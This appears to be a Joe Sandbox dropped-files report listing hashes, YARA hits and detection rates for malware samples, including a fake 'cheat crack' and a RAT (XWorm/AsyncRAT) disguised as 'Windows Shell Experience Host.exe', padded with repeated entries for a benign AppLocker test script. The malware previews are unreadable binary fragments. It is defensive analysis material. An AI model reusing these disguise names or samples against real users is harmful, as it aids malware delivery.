                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.8g................................. ........@.. .......................@............@.....................................S.......>.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...>...........................@..@.reloc....... ......................@..B........................H........_..........&.....................................................(....*.r...p*. .M^.*..(....*.r...p*. k;..*.s.........s.........s.........s.........*.r5..p*. ....*.rO..p*. ....*.ri..p*. ~.H.*.r...p*. E/..*.r...p*. .O..*..((...*.r...p*. .=l.*.r...p*. .&..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Q...*"(....+.*&(....&+.*.+5sc... .... .'..od...(,...~....-.(_...(Q...~....oe...&.-.*.r...p*. ...*.r...p*. ...*.r...p*. J...*.r...p*. $...*.r,..p*. ...*.rF..p*. "Y..*.r`.
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\EsgeCzT4do.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3730944
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.767512614448502
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:98304:E+woaBHtFIT4bNJFY3Oqtbh+KH4kpc+DX/0Huhd:E+nAbjBHYcKYODtd
                                                                                                                                                                                                                                                                                    MD5:38023663C5BBA5E8D46CEE0612E57A51
                                                                                                                                                                                                                                                                                    SHA1:FD21A4AAFA31EE8EBD851590E0EC79F7996725AC
                                                                                                                                                                                                                                                                                    SHA-256:A02B92AE36CA6FDC300A95A3E29D5A824F2F12A91E0BB6A6F499808AC12C816C
                                                                                                                                                                                                                                                                                    SHA-512:C8AB8E304D5E224153D8C7822646E9127520929CEC32F655B69EA299540E6D824B9B7E57E6DC3C17CE97D6AAF71CDA6DD499F9C7F6E59237276F5832A13573F1
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 49%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..............."...0...4.............. ....@...... ....................... 9...........`...@......@............... ................................5.............................................................................................. ..H............text.....4.. ....4................. ..`.rsrc.........5.......4.............@..@........................................H.......,72..............T..l...........................................Br...p(....(....*Z(....&.....(....o....*n.-.r...p .<}%.(....*.o....*.0..e.......(....&(....o .....o!....1...o"....<..+...(....(#...($.........(......~%.....f...%.rC..p.%.rG..p.%.rK..p.(&.....b...%......(.....o'........<XK.X....,%.((...-......i...%...o)....h...($.......XI......XI.........(*.......X..X....k........ ......k........ ......k........ .L.)...k........ ..9......X(+...%($.....@..(....&%.(,...(....&%.(,.
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\EsgeCzT4do.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):88064
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.069489521165363
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:NG9nICDiZGhCMhOB0s1SbiFG9Ox7h86BOMhUL02dC+IHZK:NgICDiZQRhVeFG9e7h86BOM+Nd6c
                                                                                                                                                                                                                                                                                    MD5:17F122079462E212871A1E2EB20EAFF9
                                                                                                                                                                                                                                                                                    SHA1:349E4B54323ACCE835916A2BBE40DC9C5D30931F
                                                                                                                                                                                                                                                                                    SHA-256:F483197DF60B8767D23FA820EFAAB0C6BCC3A4B02EBEE3C8F1290EF699F6697E
                                                                                                                                                                                                                                                                                    SHA-512:95548CB30E9E45C4024BE181253200D2188B622754158F6268FA09E41327DBB8468399A1B5DDD9D868413638BF1B9B18F6814586530F2C6A0A6CBD6311234E94
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f................................. ........@.. ....................................@....................................S................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc..............................@..@.reloc...............V..............@..B........................H........^..H[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
